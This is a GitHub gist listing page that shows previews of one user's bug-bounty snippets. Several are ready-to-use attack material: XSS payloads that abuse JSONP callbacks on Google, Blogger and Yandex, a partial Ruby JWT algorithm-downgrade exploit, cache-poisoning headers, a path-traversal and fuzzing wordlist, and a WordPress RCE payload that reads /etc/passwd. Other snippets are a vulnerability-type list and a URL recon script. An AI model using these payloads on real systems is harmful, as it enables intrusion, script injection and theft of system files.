Skip to content

Instantly share code, notes, and snippets.

View Lopseg's full-sized avatar
💭
Available

Rafael Rodrigues Lopseg

💭
Available
60 followers · 13 following
View GitHub Profile
@Lopseg
Lopseg / poc.json
Last active April 10, 2020 13:09
poc.json
{
"metadata": {
"css": [
""
],
"name": ""
},
"nbformat": 3,
"nbformat_minor": 0,
"worksheets": [
@Lopseg
Lopseg / jsonbee.txt
Created December 20, 2019 22:58
#Google.com:
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
"><script src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script>
"><script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
"><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
#Blogger.com:
"><script src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script>
#Yandex:
"><script src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script>
@Lopseg
Lopseg / vuln_list.txt
Created November 9, 2019 09:30
150 vulnerability types that you can submit for. Thanks to @thecybermentor and hackerone.
Account Hijacking
Allocation of Resources Without Limits or Throttling - CWE-770
Array Index Underflow - CWE-129
Authentication Bypass Using an Alternate Path or Channel - CWE-288
Brute Force - CWE-307
Buffer Over-read - CWE-126
Buffer Underflow - CWE-124
Buffer Under-read - CWE-127
Business Logic Errors - CWE-840
Classic Buffer Overflow - CWE-120
@Lopseg
Lopseg / filepaths.txt
Created September 19, 2019 16:22
Here are filepaths that are always good to check if our targets have some of them
op/oauth/sketchfab
op/oauth/dropbox
@Lopseg
Lopseg / jwt_downgrade.rb
Created September 1, 2019 20:18
jwt ruby exploits that can be used to exploit JWT downgrade vulnerabilities. RS256 to HS256
require 'base64'
require 'openssl'
pub = File.open("public.pem").read
TOKEN = "XXX"
header, payload, signature = TOKEN.split('.')
@Lopseg
Lopseg / dicc.txt
Last active March 15, 2022 17:07
/secure/popups/UserPickerBrowser.jspa
WEB-INF/context/db-context-standalone.xml
!.gitignore
!.htaccess
!.htpasswd
%20../
%2e%2e//google.com
%3f/
%EXT%
%ff/
@Lopseg
Lopseg / cache poison headers
Created August 2, 2019 02:34
X-Forwarded-Host: wootwoot
X-Host: wootwoot.net
X-Forwarded-Server: wootwoot
X-Original-URL: /wootwoot
@Lopseg
Lopseg / wp_rce.txt
Created June 15, 2019 12:21
rce
<pre>system('cat /etc/passwd')</pre>
@Lopseg
Lopseg / waybackurls.py
Last active August 3, 2019 10:07 — forked from mhmdiaa/waybackurls.py
Lopseg forked version of waybackurls.py
#!/usr/bin/python2
import requests
import sys
import json
import os
all_urls = []
urls_wparams = []
def create_report(all_data,parameters):